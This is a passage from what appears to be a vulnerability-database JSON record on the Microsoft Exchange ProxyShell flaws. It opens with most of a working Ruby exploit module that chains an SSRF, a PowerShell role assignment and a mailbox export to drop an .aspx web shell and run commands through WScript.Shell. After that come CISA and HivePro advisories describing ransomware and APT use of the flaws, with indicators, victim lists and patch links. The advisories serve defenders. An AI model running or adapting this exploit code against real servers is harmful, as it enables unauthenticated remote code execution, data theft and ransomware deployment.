\n\"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\" \n) \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>}, \n\"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\" \n) \nsend_http(method, uri, opts) \nend \n}) \n \nwinrm.shell(:powershell) do |shell| \nshell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH) \nshell.extend(SSRFWinRMConnection::PowerShell) \nshell.run({ cmdlet: cmdlet, args: args }) \nend \nend \n \ndef exploit \n@ssrf_email ||= Faker::Internet.email \nprint_status('Attempt to exploit for CVE-2021-34473') \nrun_cve_2021_34473 \n \npowershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none) \nfail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200 \n \nprint_status('Assigning the \\'Mailbox Import Export\\' role') \nexecute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ]) \n \n@shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\" \nif datastore['UseAlternatePath'] \nunc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nelse \nunc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nend \n \nnormal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\') \nprint_status(\"Writing to: #{normal_path}\") \nregister_file_for_cleanup(normal_path) \n \n@export_name = rand_text_alphanumeric(8..12) \nexecute_powershell('New-MailboxExportRequest', args: [ \n{ name: '-Name', value: @export_name }, \n{ name: '-Mailbox', value: datastore['EMAIL'] }, \n{ name: '-IncludeFolders', value: '#Drafts#' }, \n{ name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" }, \n{ name: '-ExcludeDumpster' }, \n{ name: '-FilePath', value: unc_path } \n]) \n \nprint_status('Waiting for the export request to complete...') \n30.times do \nif execute_command('whoami')&.code == 200 \nprint_good('The mailbox export request has completed') \nbreak \nend \nsleep 5 \nend \n \nprint_status('Triggering the payload') \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nboundary = rand_text_alphanumeric(8..12) \nresponse = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\") \n \nprint_warning('Dumping command output in response') \nif response.body =~ /START#{boundary}(.*)END#{boundary}/m \nprint_line(Regexp.last_match(1).strip) \nelse \nprint_error('Empty response, no command output') \nend \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \ndef cleanup \nsuper \nreturn unless @common_access_token && @export_name \n \nprint_status('Removing the mailbox export request') \nexecute_powershell('Remove-MailboxExportRequest', args: [ \n{ name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" }, \n{ name: '-Confirm', value: false } \n]) \nend \n \ndef execute_command(cmd, _opts = {}) \nif !cmd_windows_generic? \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\" \nelse \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nend \n \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @shell_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@shell_input_name}=#{cmd}\" \n) \nend \nend \n \nclass PstEncoding \nENCODE_TABLE = [ \n71, 241, 180, 230, 11, 106, 114, 72, \n133, 78, 158, 235, 226, 248, 148, 83, \n224, 187, 160, 2, 232, 90, 9, 171, \n219, 227, 186, 198, 124, 195, 16, 221, \n57, 5, 150, 48, 245, 55, 96, 130, \n140, 201, 19, 74, 107, 29, 243, 251, \n143, 38, 151, 202, 145, 23, 1, 196, \n50, 45, 110, 49, 149, 255, 217, 35, \n209, 0, 94, 121, 220, 68, 59, 26, \n40, 197, 97, 87, 32, 144, 61, 131, \n185, 67, 190, 103, 210, 70, 66, 118, \n192, 109, 91, 126, 178, 15, 22, 41, \n60, 169, 3, 84, 13, 218, 93, 223, \n246, 183, 199, 98, 205, 141, 6, 211, \n105, 92, 134, 214, 20, 247, 165, 102, \n117, 172, 177, 233, 69, 33, 112, 12, \n135, 159, 116, 164, 34, 76, 111, 191, \n31, 86, 170, 46, 179, 120, 51, 80, \n176, 163, 146, 188, 207, 25, 28, 167, \n99, 203, 30, 77, 62, 75, 27, 155, \n79, 231, 240, 238, 173, 58, 181, 89, \n4, 234, 64, 85, 37, 81, 229, 122, \n137, 56, 104, 82, 123, 252, 39, 174, \n215, 189, 250, 7, 244, 204, 142, 95, \n239, 53, 156, 132, 43, 21, 213, 119, \n52, 73, 182, 18, 10, 127, 113, 136, \n253, 157, 24, 65, 125, 147, 216, 88, \n44, 206, 254, 36, 175, 222, 184, 54, \n200, 161, 128, 166, 153, 152, 168, 47, \n14, 129, 101, 115, 228, 194, 162, 138, \n212, 225, 17, 208, 8, 139, 42, 242, \n237, 154, 100, 63, 193, 108, 249, 236 \n].freeze \n \ndef self.encode(data) \nencoded = '' \ndata.each_char do |char| \nencoded << ENCODE_TABLE[char.ord].chr \nend \nencoded \nend \nend \n \nclass XMLTemplate \ndef self.render(template_name, context = nil) \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\") \ntemplate = ::File.binread(file_path) \ncase context \nwhen Hash \nb = binding \nlocals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" } \nb.eval(locals.join) \nelse \nraise ArgumentError \nend \nb.eval(Erubi::Engine.new(template).src) \nend \nend \n \nclass SSRFWinRMConnection < WinRM::Connection \nclass MessageFactory < WinRM::PSRP::MessageFactory \ndef self.create_pipeline_message(runspace_pool_id, pipeline_id, command) \nWinRM::PSRP::Message.new( \nrunspace_pool_id, \nWinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline], \nXMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]), \npipeline_id \n) \nend \nend \n \n# we have to define this class so we can define our own transport factory that provides one backed by the SSRF \n# vulnerability \nclass TransportFactory < WinRM::HTTP::TransportFactory \nclass HttpSsrf < WinRM::HTTP::HttpTransport \n# rubocop:disable Lint/ \ndef initialize(endpoint, options) \n@endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint \n@ssrf_proc = options[:ssrf_proc] \nend \n \ndef send_request(message) \nresp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message }) \nWinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml \nend \nend \n \ndef create_transport(connection_opts) \nraise NotImplementedError unless connection_opts[:transport] == :ssrf \n \nsuper \nend \n \nprivate \n \ndef init_ssrf_transport(opts) \nHttpSsrf.new(opts[:endpoint], opts) \nend \nend \n \nmodule PowerShell \ndef send_command(command, _arguments) \ncommand_id = SecureRandom.uuid.to_s.upcase \nmessage = MessageFactory.create_pipeline_message(@runspace_id, command_id, command) \nfragmenter.fragment(message) do |fragment| \ncommand_args = [connection_opts, shell_id, command_id, fragment] \nif fragment.start_fragment \nresp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build) \ncommand_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text \nelse \ntransport.send_request(WinRM::WSMV::SendData.new(*command_args).build) \nend \nend \n \ncommand_id \nend \nend \n \ndef initialize(connection_opts) \n# these have to be set to truthy values to pass the option validation, but they're not actually used because hax \nconnection_opts.merge!({ user: :ssrf, password: :ssrf }) \nsuper(connection_opts) \nend \n \ndef transport \n@transport ||= begin \ntransport_factory = TransportFactory.new \ntransport_factory.create_transport(@connection_opts) \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163895/exchange_proxyshell_rce.rb.txt"}], "cisa": [{"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-03-25T05:32:31", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here APT35 aka Magic Hound, an Iranian-backed threat group, has begun using Microsoft Exchange ProxyShell vulnerabilities as an initial attack vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries. The threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access to create web shells and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the "remote desktop users" and "local administrator's users" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. Then they create a process memory dump from LSASS.exe that is zipped before exfiltration via web shell. The threat actor uses native Windows programs like "net" and "ipconfig" to enumerate the compromised server. A file masquerading as dllhost.exe is used to access certain domains for command and control. Therefore, data can be exfiltrated by the threat actor which could potentially resulting in information theft and espionage. The Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. Organizations can patch these vulnerabilities using the patch links given below. The MITRE TTPs commonly used by APT35 are: TA0001: Initial AccessTA0002: ExecutionTA0003: PersistenceTA0004: Privilege EscalationTA0005: Defense EvasionTA0006: Credential AccessTA0007: DiscoveryTA0011: Command and ControlT1190: Exploit Public-Facing ApplicationT1003: OS Credential DumpingT1098: Account ManipulationT1078: Valid AccountsT1105: Ingress Tool TransferT1036: MasqueradingT1036.005: Masquerading: Match Legitimate Name or LocationT1543: Create or Modify System ProcessT1543.003: Create or Modify System Process: Windows ServiceT1505: Server Software ComponentT1505.003: Server Software Component: Web ShellT1082: System Information DiscoveryT1016: System Network Configuration DiscoveryT1033: System Owner/User DiscoveryT1059: Command and Scripting InterpreterT1059.003: Command and Scripting Interpreter: Windows Command Shell Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 References https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\n \n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. Proxy Shell was addressed by hive pro threat researcher in the previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated, remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors then install web shells, coin miners, ransomwares or backdoors on the servers. Attackers then use this web shell to deploy cobalt strike beacon into Windows Update Agent and get the credentials for a service account on compromised servers. The actor then installs Anydesk to gain control of the system and do lateral movement in the organization network. Post exploitation, attackers carry on with using Cobalt Strike to execute the Blackbyte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their server for ProxyShell vulnerabilities using the link down below.\n\n**Techniques used by Blackbyte ransomware are :**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files of Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n \n\n#### Vulnerability Details\n\n \n\n\n\n \n\n#### Actor Detail\n\n \n\n\n\n \n\n#### Indicators of Compromise(IoCs)\n\n \n\n\n\n \n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n \n\n#### References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and their affiliates access their victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploiting weaknesses on external-facing assets. Furthermore, Hive leaves a plain-text ransom letter threatening to disclose the victim's data on the TOR website 'HiveLeaks' if the victim does not meet the attacker's terms. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The MITRE ATT&CK TTPs used by Hive Ransomware are: TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and ControlTA0010: Exfiltration TA0040: ImpactT1190: Exploit Public-Facing ApplicationT1566: PhishingT1566.001: Spear-phishing attachmentT1106: Native APIT1204: User ExecutionT1204.002: Malicious FileT1059: Command and Scripting InterpreterT1059.001: PowerShellT1059.003: Windows Command ShellT1053: Scheduled Task/JobT1053.005: Scheduled TaskT1047: Windows Management InstrumentT1136: Create AccountT1136.002: Domain AccountT1078: Valid AccountsT1078.002: Domain AccountsT1053: Boot or logon autostart executionT1068: Exploitation for Privilege EscalationT1140: Deobfuscate/Decode Files or InformationT1070: Indicator Removal on Host T1070.001: Clear Windows Event LogsT1562: Impair DefensesT1562.001: Disable or Modify ToolsT1003: OS Credential DumpingT1003.005: Cached Domain Credentials|T1018: Remote System DiscoveryT1021: Remote ServicesT1021.001: Remote Desktop ProtocolT1021.002: SMB/Windows admin sharesT1021.006: Windows Remote ManagementT1083: File and directory discoveryT1057: Process discoveryT1063: Security software discoveryT1049: System Network Connections DiscoveryT1135: Network Share DiscoveryT1071: Application Layer ProtocolT1071.001: Web ProtocolsT1570: Lateral tool transfer1486: Data Encrypted for ImpactT1005: Data from local systemT1560: Archive Collected DataT1560.001: Archive via UtilityT1105: Ingress Tool TransferT1567: Exfiltration over web service Actor Details Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches https://millsgrouponline.com/ https://www.fcch.com/ https://www.konradin.de/de/ https://www.pollmann.at/en https://www.emilfrey.ch/de https://rte.com.br/ https://www.friedrich.com/ https://powerhouse1.com/ https://www.hshi.co.kr/eng/ https://www.eurocoininteractive.nl/ https://www.itsinfocom.com/ https://www.pan-energy.com/ https://nsminc.com/ https://www.ucsiuniversity.edu.my/ https://kemlu.go.id/portal/id Patch Links https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 References https://www.varonis.com/blog/hive-ransomware-analysis https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they've now infiltrated many Microsoft Exchange Servers . The origins of this gang are most likely China. This gang used a similar ransomware note as of LokiBot and is been linked to Conti ransomware due to the email id provided (contact@contipauper[.]com). HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a \na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", "id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": "https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 430 5 2 Worldwide 17 46 The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities out of which 5 gained the attention of Threat Actors and security 